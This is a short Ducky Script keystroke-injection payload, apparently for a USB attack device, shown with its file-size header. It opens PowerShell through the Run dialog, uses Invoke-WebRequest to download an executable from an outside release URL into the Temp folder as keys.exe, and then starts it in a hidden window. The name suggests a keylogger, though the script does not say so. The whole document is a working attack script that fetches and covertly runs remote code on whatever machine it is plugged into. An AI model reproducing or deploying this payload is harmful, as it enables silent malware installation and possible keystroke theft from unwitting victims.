16 lines
425 B
Plaintext
16 lines
425 B
Plaintext
REM open powershell
|
|
GUI r
|
|
DELAY 1000
|
|
STRING powershell
|
|
ENTER
|
|
DELAY 2000
|
|
|
|
REM download client.exe file
|
|
STRING Invoke-WebRequest https://gitea.svitan.dev/Streamer272/keys/releases/download/latest/client.exe -OutFile .\AppData\Local\Temp\keys.exe
|
|
ENTER
|
|
DELAY 15000
|
|
|
|
REM client.exe file (closes automatically)
|
|
STRING powershell.exe -WindowStyle hidden { Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow }
|
|
ENTER
|